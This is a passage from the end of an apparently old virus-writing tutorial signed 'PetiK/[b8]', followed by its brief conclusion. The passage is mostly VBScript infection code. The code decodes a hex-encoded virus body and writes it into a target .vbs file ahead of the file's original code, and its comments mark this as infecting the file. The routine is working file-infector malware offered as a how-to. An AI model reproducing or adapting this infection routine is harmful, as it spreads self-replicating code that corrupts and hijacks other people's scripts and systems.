vbsorg = cot.ReadAll()
cot.Close
----------- here we infect the VBS file -----------
For Y=1 To Len(vbshex) Step 2
virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
Next
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.Write virvbs ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
----------- here we infect the VBS file -----------
End If
###################
# V: CONCLUSION : #
###################
This is the end of the article. If you have some suggestions or new ideas, please mail me to
petikvx@aol.fr.
PetiK/[b8] (www.petikvx.fr.fm)